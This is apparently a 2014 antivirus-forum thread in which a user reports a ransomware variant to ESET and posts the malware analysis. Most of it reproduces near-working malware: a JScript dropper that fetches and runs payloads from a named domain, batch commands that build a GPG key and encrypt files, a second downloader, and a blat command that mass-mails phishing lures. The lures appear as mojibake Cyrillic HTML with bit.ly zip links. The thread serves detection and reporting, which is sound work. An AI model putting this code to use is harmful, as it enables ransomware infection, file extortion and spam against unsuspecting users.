JAMEWT
-
Posts
9 -
Joined
-
Last visited
Posts posted by JAMEWT
-
-
By the way: @@JAMEWT (ESET member)
You found this threat, post it here, said thanks to yourself and also said to yourself that you added detection?
And after this all you praise yourself (ok or ESET)?!
I think there is something wrong!
Edit: BTW: You also reported another Cryptolocker here . Is it the same cryptolocker? Or do like to have a second sight a second time and say it will be added?
Edit2: OK, I see it's a downloader for this cryptolocker...
i report the mail receive from ESET , and not thanks to me but thanks to the text inside the post from eset because ESET not answer here but to mail
I also reported another Cryptolocker = is not the same criptolocker
-
i know that "Undetected by most AVs in VirusTotal:"
but sorry but don't meaning nothing ... last or least .. understand what i meaning
however i SUD to you and you add detection -- VERY GOOD WORK
-
Thank you for your submission.
The detection for this threat will be included in our next signature update.
sansviolence.exe - Win32/Filecoder.NCD trojan -
SAMPLES SENT TO ESET
new cryptolocker variant
***********************************************************************************************
FIle downloaded from: hxxp://5.199.171.47/patriote/sansviolence
C&C IP address:
5.199.171.47
*********************************************************************************************************
Can you please add detection?
-
From 2014/08/05 there is this new RansomWare
At 2014/08/06 i have sent you sample and you have add detection and block download of the zip file but eset not detect btc file
**********************************************************************************************************
ESET Malware Response Team have the file from 2014/08/06
06/08/2014 20:05:16 Kernel ESET Il file 'D:\A MALWARE\keybtc.btc' è stato inviato a ESET per l'analisi.
*****************************************************************************
I EXPLAIN
This *.JS file after execute it download a lot of files and do a lot of work ..
Information thank to @MalwareHunter (malwaretips.com)
JS file
////////// autoreplicant bot /////////
/////////////////// var intoxicated twice ////////////////
var nosensetoblock="collapseit.com",tfolder="%TEMP%\\",WshShell=WScript.CreateObject("WScript.Shell");function autoreply(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="%TEMP%\\keybtc.cmd",autorotatedomain="images";function CreateObject©{return new ActiveXObject©}
var WshShell=CreateObject("WScript.Shell"),tfolder=WshShell.ExpandEnvironmentStrings(tfolder),docrun="%TEMP%\\document.doc";try{autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/document.btc",""+tfolder+"document.doc"),WshShell.Run(""+docrun+"",1,0)}catch(docs){}autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/day.btc",""+tfolder+"day.btc");autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/null.btc",""+tfolder+"null.btc");
autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/sad.btc",""+tfolder+"sad.btc");autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/keybtc.btc",""+tfolder+"keybtc.cmd");
WshShell.Run(""+genesis+"",0,0);Ok download this file
hXXp://collapseit.com/images/sad.btc-MD5: e189b5ce11618bb7880e9b09d53a588fhttps://www.virustotal.com/it/file/97d27e1225b472a63c88ac9cfb813019b72598b9dd2d70fe93f324f7d034fb95/analysis/1406556814/hxxp://collapseit.com/images/null.btc-MD5: 778232ba5aa586021a27ec2bf4e7b99ahttps://www.virustotal.com/it/file/c201989c78d9f8a8c8a18577b3deb6baf71fbc13594e545015ba96d69da724dc/analysis/1407318858/hxxp://collapseit.com/images/day.btc-MD5: 352369b32c971e1a7f56ef29593abb44https://www.virustotal.com/it/file/1e56cc30ea50c74c6795a9aed142ad5e5fd51ddc17080f948cb23d647c5b8553/analysis/1407196678/hxxp://collapseit.com/images/document.btc-MD5: 50a561c0d0f0c49974dfb15763f73202https://www.virustotal.com/it/file/62a86e1ba6b2d629ec54822c1ca16ef995cd9f18965f03fa918486f2f3795192/analysis/1407320991/hxxp://collapseit.com/images/keybtc.btc-MD5: 3ca63d203556c63d5e0c06d78f6aae4chttps://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/1407331101/
after execute
keybtc.btc (after drop: keybtc.cmd)
C:\Users\%UserName%\AppData\Local\Temp>echo Key-Type: RSA 1>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Key-Length: 1024 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Name-Real: genesis 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Name-Comment: keybtc@gmail.com 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo Name-Email: keybtc@gmail.com 1>>genrsa.btcC:\Users\%UserName%\AppData\Local\Temp>echo -----BEGIN PGP PUBLIC KEY BLOCK----- 1>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo Version: GnuPG v1 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo.1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo mQENBFPgfZQBCACwmI/ra8/PJnw1YAvQZ8mszyEtIfJ4GA2jTM3ih9qCWMRb3cCI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo heeVFaBTyAp33AP0EGjRDcg7E4VihowO2zCqJa7QkEfxVLwYKbEiEEnns4VDNnut 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo eOsyHF/ZyiNshYUN3Fj+YiFMtOzEUcJEE0QuUfl2o0Ajl9BRz3cQPPSnUhKS/vmc 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo Fut1Y5GcJVWhjl4f51Grp1Q5lB9ndqCVGpG7PZ7tqQgA6934DOjGQQF3BK9ZuSJq 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo v4bMKs12cOndOIFuoim/KV5NL4wXlUes7GIlTp4P3izlobNlVfYKXgS4Vc/H/FiA 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo YVOaB7L4rVXwc7oixYSI1a4TwqXfifDhJNSRABEBAAG0ImtleWJ0YyAoa2V5YnRj 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo KSA8a2V5YnRjQGdtYWlsLmNvbT6JATgEEwECACIFAlPgfZQCGwMGCwkIBwMCBhUI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo AgkKCwQWAgMBAh4BAheAAAoJEIUsFvyqtih1ly4IAJlYEiJX2VeXV77c8M/0PRtN 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo XAGmgFjt9WNvnMGlvAY88/QUMwMU9XV2gXTc+KiLacuagofhGpHOuZf3suSBYMDS 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo oi135YTGs1sAWOx2kBwmyW8rrNLZ84V4wa97I9nEbzIYB0thzr3euu0QTz78hj2v 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo Gai2uA82F45XFcjXhPKINbSgMCYIpbhfjUCMbSVy8+3rF9fUDWICVwzAof467GOI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo b4SKcDkX5IOzDugDnKXvKwDNr9fcomZhhVUz5djF1TTORc0qXQye2GiFa6ZtE4aH 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo WFw6hKfBIgaJGFIqnr7be0Di1duWisnCYS2n9/VDcZpeOpv7uqc78KDJ+Ogm27W5 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo AQ0EU+B9lAEIAMcXK4tuglxptwQKg4aODX8OnSbAyAQW5QHTK9d4GG40vry8IJVx 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo pUYe7fgax7OIkKLnYjo0uNXnBD70e3Z80WhDK1/2eIC4MxqVAD4cKP2yKZOFLKi2 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo BJ7BdYk+y4d2MgqGuGIt84Wp0Zrcs1O32pS2lXfaBxjREaAUuqzy4MU0AJ5+5tK0 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo qeD1OTxJhYivIky/qrmDtMf0G/WzxULV1iy0pkDP/s44KmsQxept3MzmCMgdAXmg 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo 2ANdP5r+UOglQeLKBmyLhCAcNqvHPU5I2X5qWmAbU0Z8IT/M1m/SE0/r9VF63C+Y 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo g3HQQDVZYOFWqi2uHOoU/LZ157kgF5gYqNUAEQEAAYkBHwQYAQIACQUCU+B9lAIb 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo DAAKCRCFLBb8qrYodQp3B/0SeVJOLU+3gmq+R7VLqNbeS6NZ9KnZQvda3vyE0/+t 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo FGx3Xo6Gf4chi+hTY33Ph+/4xA0cFg3i2YDSZRunDKG3OavrRDIpF6SNIH/X/sPU 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo IQxATi1Sq/EmNzJdAqqqYNQT7YlWyVjI2pLcbberET+9LHIMcatnQ08GZQDViiSI 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo o7fW4sVYMgnRS5OXOwzMqW7wLuLbIGuTZQXTIOAoOhuZtfmy5woCRwF9sygYu5yw 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo iwQkX2P/Ffzwrpu92J8uqoVeUXdBV8bgnK92KKKi/F4czak/DLa453cLlwozPxSv 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo 6/RKzQXVaopzuOdvdRTwKSb+mFr+gsMlQ1t7xNcMdW84 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo =yxjK 1>>2048key.btcC:\Users\%UserName%\AppData\Local\Temp>echo -----END PGP PUBLIC KEY BLOCK----- 1>>2048key.btc
C:\Users\%UserName%\AppData\Local\Temp\svchost.exe" -r keybtc --yes --trust-model always --no-verbose -q --encrypt-files "C:\Users\%UserName%\AppData\Local\Temp\secring.gpg"
(Remark: svchost.exe is the dropped null.btc after renaming.)
(Create another JS files)
C:\Users\%UserName%\AppData\Local\Temp>echo var earthlingsfilm="collapseit.com",WshShell=WScript.CreateObject("WScript.Shell");function touchdown(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="autoreplicant";touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/coherence.btc","coherence.btc"); 1>autoreplicant.jsC:\Users\%UserName%\AppData\Local\Temp>echo touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/lsass.btc","lsass.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spool.btc","spool.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spoolsv.btc","spoolsv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/sv.btc","sv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/tobi.btc","tobi.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/collapse.btc","collapse.btc"); 1>>autoreplicant.jsAlso creates html (filename: ltr*.html) files with links like this:
hxxp://bit.ly/invoice2014- (eset block all download)
C:\Users\%UserName%\AppData\Local\Temp>echo var earthlingsfilm="collapseit.com",WshShell=WScript.CreateObject("WScript.Shell");function touchdown(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="autoreplicant";touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/coherence.btc","coherence.btc"); 1>autoreplicant.js
C:\Users\%UserName%\AppData\Local\Temp>echo touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/lsass.btc","lsass.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spool.btc","spool.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spoolsv.btc","spoolsv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/sv.btc","sv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/tobi.btc","tobi.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/collapse.btc","collapse.btc"); 1>>autoreplicant.js
C:\Users\%UserName%\AppData\Local\Temp>copy /b "C:\Users\%UserName%\AppData\Local\Temp\collapse.btc" + "C:\Users\%UserName%\AppData\Local\Temp\tobi.btc" ttl.exe
C:\Users\%UserName%\AppData\Local\Temp>del /f /q tobi.btc & del /f /q collapse.btc
C:\Users\%UserName%\AppData\Local\Temp>RENAME lsass.btc lsass.exe
C:\Users\%UserName%\AppData\Local\Temp>RENAME coherence.btc coherence.exe
C:\Users\%UserName%\AppData\Local\Temp>RENAME spoolsv.btc spoolsv.exe
C:\Users\%UserName%\AppData\Local\Temp>RENAME spool.btc blat.lib
C:\Users\%UserName%\AppData\Local\Temp>RENAME sv.btc blat.dll
C:\Users\%UserName%\AppData\Local\Temp>ttl.exe -f ttl.pwd
C:\Users\%UserName%\AppData\Local\Temp>taskkill /f /im 1Cv8N.exe
C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\autoreplicant.js"(Remark: These *.btc files dropped by the second js file autoreplicant.js .)
C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr1.html
C:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr1.html
C:\Users\%UserName%\AppData\Local\Temp>echo КаÐs и дÐlÐlÐlÐ?аN€Ð¸Ð?алиNNS N Ð?аN?иÐL N€N?ÐsÐlÐ?ÐlдNN‚Ð?ÐlÐL, ÐzеN€ÐµNN‹Ð»Ð°NŽ ВаÐL NN‡ÐµN‚ длNZ ÐlÐzлаN‚N‹ (Ð?Ðl Ð?лÐlжеÐ?ии). ОN€ÐlаÐ?изN?ÐaN‚е, ÐzÐlжалN?ÐaNN‚а, ÐzлаN‚еж.<br> 1>>ltr1.html
C:\Users\%UserName%\AppData\Local\Temp>echo КÐlÐlда бN?N…ÐlалN‚еN€Ð¸NZ Ð?Nе ÐzN€ÐlÐ?едеN‚, ÐlN‚ÐzиN?иN‚еNNS ÐLÐ?е - NZ ÐzN€ÐlÐ?еN€NŽ ÐzN€Ð¸N…Ðlд деÐ?еÐl. <br> 1>>ltr1.html
C:\Users\%UserName%\AppData\Local\Temp>echo ДÐlÐlÐlÐ?ÐlN€ N? ВаN иÐLееN‚NNZ? Ð?ли ÐLÐ?е Ð?N‹NлаN‚NS ÐsÐlÐzиNŽ? <br><br> 1>>ltr1.html
C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr1.html
C:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/invoice2014">Ð?N‡ÐµN‚_длNZ_ÐlÐzлаN‚N‹ (аÐ?Ðl.).zip</a> 1>>ltr1.html
C:\Users\%UserName%\AppData\Local\Temp>set RND0=22361
C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr2.html
C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?и бN?N…ÐlалN‚еN€Ð° ÐzÐlÐzN€ÐlNили ÐzеN€ÐµNлаN‚NS ВаÐL NN‡ÐµN‚ Ð?Ф-14-22361 (NÐL. ÐzN€Ð¸Ð»ÐlжеÐ?ие).<br>Ð’N‹ ÐLÐlÐlли бN‹ N?зÐ?аN‚NS, бN‹Ð»Ð° ли ÐzÐl Ð?еÐLN? ÐlÐzлаN‚а?<br>ÐzÐl даÐ?Ð?N‹ÐL Ð?аN?еÐa базN‹ ÐzÐl NTN‚ÐlÐLN? ÐzлаN‚ежN? за ВаÐLи Ð?иNиN‚ дÐlлÐl. Ð’ÐlзÐLÐlжÐ?Ðl, ÐsаÐsаNZ-N‚Ðl ÐlN?ибÐsа.<br>ÐzN€ÐlÐ?еN€NSN‚е, ÐzÐlжалN?ÐaNN‚а.<br><br> 1>>ltr2.html
C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr2.html
C:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/invoice142014">Ð?N‡ÐµN‚ Ð?Ф-14-22361_2014.zip</a> 1>>ltr2.html
C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr3.html
C:\Users\%UserName%\AppData\Local\Temp>echo ÐLÐ?ажаеÐLN‹Ðµ ÐsÐlллеÐlи, <br> 1>>ltr3.html
C:\Users\%UserName%\AppData\Local\Temp>echo ÐsN‹ ÐzN€ÐlÐ?ÐlдиÐL ежеÐLеNNZN‡Ð?N?NŽ NÐ?еN€ÐsN?. Ð’ ÐzN€Ð¸Ð»ÐlжеÐ?ии - ÐzN€ÐlеÐsN‚ ÐÐsN‚а ÐzÐl ВаN?еÐLN? ÐzN€ÐµÐ´ÐzN€Ð¸NZN‚иNŽ.<br>Ð?аÐL ÐzÐlлN?N‡Ð°ÐµN‚NNZ дÐlлÐl ÐzN€Ð¸ÐLеN€Ð?Ðl Ð?а 10 N‚N‹N. ÐzN€ÐlÐ?еN€NSN‚е ÐzÐl NÐ?ÐlиÐL базаÐL, Ð?Nе ли ÐzN€Ð°Ð?илNSÐ?Ðl. <br> 1>>ltr3.html
C:\Users\%UserName%\AppData\Local\Temp>echo ЖдN? ÐlN‚Ð?еN‚а, NÐzаNибÐl. <br><br> 1>>ltr3.html
C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr3.html
C:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/revise2014">ÐzN€ÐlеÐsN‚ ÐÐsN‚а NÐ?еN€Ðsи-2014.zip</a> 1>>ltr3.html
C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr4.html
C:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr4.html
C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ ÐzN€ÐlÐ?еN€Ð¸Ð»Ð° ÐlÐzлаN‚N? ÐzÐl NN‚аN€N‹ÐL ÐzÐlNN‚аÐ?ÐsаÐL. <br> 1>>ltr4.html
C:\Users\%UserName%\AppData\Local\Temp>echo К ÐzиNNSÐLN? ÐzN€Ð¸Ð»ÐlжеÐ?а ÐsÐlÐzиNZ ÐÐsN‚а NÐ?еN€Ðsи ÐzÐl ВаN?еÐLN? ÐzN€ÐµÐ´ÐzN€Ð¸NZN‚иNŽ. Ð?ÐlÐlлаNÐ?Ðl Ð?аN?еÐa иÐ?N„ÐlN€ÐLаN†Ð¸Ð¸ Ð’N‹ Ð?аÐL Ð?еÐLÐ?ÐlÐlÐl Ð?едÐlÐzлаN‚или ÐzÐl дÐ?N?ÐL NN‡ÐµN‚аÐL.<br> 1>>ltr4.html
C:\Users\%UserName%\AppData\Local\Temp>echo ÐzN€ÐlÐ?еN€NSN‚е N?ÐsазаÐ?Ð?N‹Ðµ даÐ?Ð?N‹Ðµ, ÐzÐlжалN?ÐaNN‚а. <br><br> 1>>ltr4.html
C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr4.html
C:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/revisecopy2014">КÐlÐzиNZ ÐÐsN‚а NÐ?еN€Ðsи (2014).zip</a> 1>>ltr4.html
C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr5.html
C:\Users\%UserName%\AppData\Local\Temp>echo ДеÐ?NS дÐlбN€N‹Ða, <br> 1>>ltr5.html
C:\Users\%UserName%\AppData\Local\Temp>echo ÐsN‹ ÐzN€ÐlÐzлаN‚или ÐzÐl ВаN?еÐLN? NN‡ÐµN‚N? (NÐsаÐ?-ÐsÐlÐzиNZ ÐzлаN‚ежÐ?ÐlÐlÐl ÐzÐlN€N?N‡ÐµÐ?иNZ Ð? аN‚N‚аN‡Ðµ). ÐzN€ÐlÐ?еN€NSN‚е ÐzN€Ð¸N…Ðlд деÐ?еÐl и ÐlN‚ÐzиN?иN‚еNNS.<br>ÐtадеNŽNNS, N N€ÐµÐsÐ?изиN‚аÐLи Ð?Nе Ð?ÐlN€ÐLалNSÐ?Ðl. <br><br> 1>>ltr5.html
C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr5.html
C:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/scancopy2014">CÐsаÐ?-ÐsÐlÐzиNZ ÐzлаN‚ежÐ?ÐlÐlÐl ÐzÐlN€N?N‡ÐµÐ?иNZ.zip</a> 1>>ltr5.html
C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr6.html
C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ ÐzN€ÐlÐ?ела ÐzлаN‚еж ÐzÐl ВаN?еÐLN? NN‡ÐµN‚N? (ÐzлаN‚ежÐsа N ÐlN‚ÐLеN‚ÐsÐlÐa баÐ?Ðsа Ð?Ðl Ð?лÐlжеÐ?ии). ÐzÐlNÐLÐlN‚N€Ð¸N‚е, ÐzN€Ð¸N?ли ли деÐ?NSÐlи. ЖдN? ÐlN‚Ð?еN‚а, NÐzаNибÐl. <br><br> 1>>ltr6.html
C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr6.html
C:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/payment20143991">ÐzлаN‚ежÐsа_ÐlN‚ÐLеN‚Ðsа баÐ?Ðsа (aug).zip</a> 1>>ltr6.html
C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr7.html
C:\Users\%UserName%\AppData\Local\Temp>echo ÐzеN€ÐµNN‹Ð»Ð°NŽ ВаÐL ÐÐsN‚N‹ ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸ ÐzÐl ДÐlÐlÐlÐ?ÐlN€N? ÐlN‚ 02.08.2014 ÐlÐlда (Ð?Ðl Ð?лÐlжеÐ?ии). ÐzÐlNÐLÐlN‚N€Ð¸N‚е, Ð?Nе ли N‚аÐL Ð?ÐlN€ÐLалNSÐ?Ðl ÐzÐl NÐlдеN€Ð¶Ð°Ð?иNŽ. ЕNли N‡N‚Ðl, ÐLN‹ NÐl NÐ?ÐlеÐa NN‚ÐlN€ÐlÐ?N‹ ÐzÐlдÐzиNN‹Ð?аеÐL дÐlÐsN?ÐLеÐ?N‚N‹ и Ð?N‹NN‹Ð»Ð°ÐµÐL ВаÐL ÐlN€Ð¸ÐlиÐ?алN‹. <br><br> 1>>ltr7.html
C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr7.html
C:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/recandtransmiss2014">ÐÐsN‚N‹ ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸.zip</a> 1>>ltr7.html
C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr8.html
C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ Ð?е ÐLÐlжеN‚ Ð?аÐaN‚и Ð?еNÐsÐlлNSÐsÐl ÐÐsN‚ÐlÐ? ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸ ÐzÐl дÐlÐlÐlÐ?ÐlN€Ð°ÐL, заÐsлNŽN‡ÐµÐ?Ð?N‹ÐL N ВаÐLи.<br>ÐzN€ÐlблеÐLа Ð? N‚ÐlÐL, N‡N‚Ðl N? Ð?аN NÐl дÐ?NZ Ð?а деÐ?NS дÐlлжÐ?а Ð?аN‡Ð°N‚NSNNZ ÐzN€ÐlÐ?еN€Ðsа ФÐtÐ?.<br>ÐsÐlжеN‚е ÐzÐlNÐLÐlN‚N€ÐµN‚NS, еNN‚NS ли N? ВаN ÐlN€Ð¸ÐlиÐ?алN‹ NTN‚иN… дÐlÐsN?ÐLеÐ?N‚ÐlÐ? (NÐsаÐ?N‹ Ð?Ðl Ð?лÐlжеÐ?ии)?<br> 1>>ltr8.html
C:\Users\%UserName%\AppData\Local\Temp>echo ÐzN€ÐlN?N? ÐlN‚Ð?еN‚иN‚NS ÐLаÐsNиÐLалNSÐ?Ðl ÐlÐzеN€Ð°N‚иÐ?Ð?Ðl. Ð?ÐzаNибÐl. <br><br> 1>>ltr8.html
C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr8.html
C:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/rectrans2014">ÐÐsN‚N‹ ÐzÐl ÐzN€Ð¸ÐµÐLN?-ÐzеN€ÐµÐ´N‡Ð¸_2014Ðl.zip</a> 1>>ltr8.html
C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr9.html
C:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr9.html
C:\Users\%UserName%\AppData\Local\Temp>echo Ð’ NÐ?NZзи N изÐLеÐ?еÐ?иNZÐLи Ð? N†ÐµÐ?ÐlÐ?ÐlÐa ÐzÐlлиN‚иÐsе Ð?аN?еÐa ÐsÐlÐLÐzаÐ?ии, ÐLN‹ N€Ð°Ð·N€Ð°Ð±ÐlN‚али N‚иÐzÐlÐ?Ðlе дÐlÐzÐlлÐ?иN‚елNSÐ?Ðlе NÐlÐlлаN?еÐ?ие длNZ ÐzÐlдÐzиNаÐ?иNZ N Ð?аN?иÐLи аÐsN‚N?алNSÐ?N‹ÐLи ÐsÐlÐ?N‚N€Ð°ÐlеÐ?N‚аÐLи.<br>ОзÐ?аÐsÐlÐLNSN‚еNNS N дÐlÐsN?ÐLеÐ?N‚ÐlÐL Ð? ÐzN€Ð¸Ð»ÐlжеÐ?ии и ÐlN‚Ð?еN‚NSN‚е ÐzÐl ÐlÐlN‚ÐlÐ?Ð?ÐlNN‚и ÐzÐlдÐzиNаÐ?иNZ. <br> 1>>ltr9.html
C:\Users\%UserName%\AppData\Local\Temp>echo Ð’ NлN?N‡Ð°Ðµ Ð?еÐlбN…ÐlдиÐLÐlNN‚и, ÐLN‹ ÐlÐlN‚ÐlÐ?N‹ N€Ð°NNÐLÐlN‚N€ÐµN‚NS ВаN?и ÐzN€Ð°Ð?Ðsи. <br> 1>>ltr9.html
C:\Users\%UserName%\AppData\Local\Temp>echo Ð?ÐzаNибÐl. <br><br> 1>>ltr9.html
C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr9.html
C:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/supplementaryagr3381">Ð?иÐzÐlÐ?Ðlе дÐlÐz.NÐlÐlлаN?еÐ?ие.zip</a> 1>>ltr9.html
C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr10.html
C:\Users\%UserName%\AppData\Local\Temp>echo ДеÐ?NS дÐlбN€N‹Ða, <br> 1>>ltr10.html
C:\Users\%UserName%\AppData\Local\Temp>echo Ð’ ÐzN€ÐlдÐlлжеÐ?ие ÐzеN€ÐµÐlÐlÐ?ÐlN€ÐlÐ? N Ð?аN?иÐL диN€ÐµÐsN‚ÐlN€ÐlÐL, Ð?аÐzN€Ð°Ð?лNZNŽ ВаÐL длNZ N€Ð°NNÐLÐlN‚N€ÐµÐ?иNZ ÐzN€ÐlеÐsN‚ дÐlÐlÐlÐ?ÐlN€Ð° (Ð? ÐzN€Ð¸Ð»ÐlжеÐ?ии). ОзÐ?аÐsÐlÐLNSN‚еNNS N дÐlÐsN?ÐLеÐ?N‚ÐlÐL.<br>ÐzN€ÐlNNSба иNÐzN€Ð°Ð?леÐ?иNZ Ð?Ð?ÐlNиN‚NS Ð? N€ÐµÐ¶Ð¸ÐLе ÐzN€Ð°Ð?ÐlÐs.<br><br>Ð?ÐzаNибÐl<br><br> 1>>ltr10.html
C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr10.html
C:\Users\%UserName%\AppData\Local\Temp>echo 1. <a href="hxxp://bit.ly/draft77182">ÐzN€ÐlеÐsN‚ дÐlÐlÐlÐ?ÐlN€Ð° (2014Ðl).zip</a> 1>>ltr10.html
echo spoolsv.exe ltr!R!.html -server smtp.mail.ru -port 587 -f !validmail! -u !validmail! -pw !Spamail! -priority 1 -sensitivity 2 -noh -noh2 -ss -html -to %a 1>>readbook.cmd )
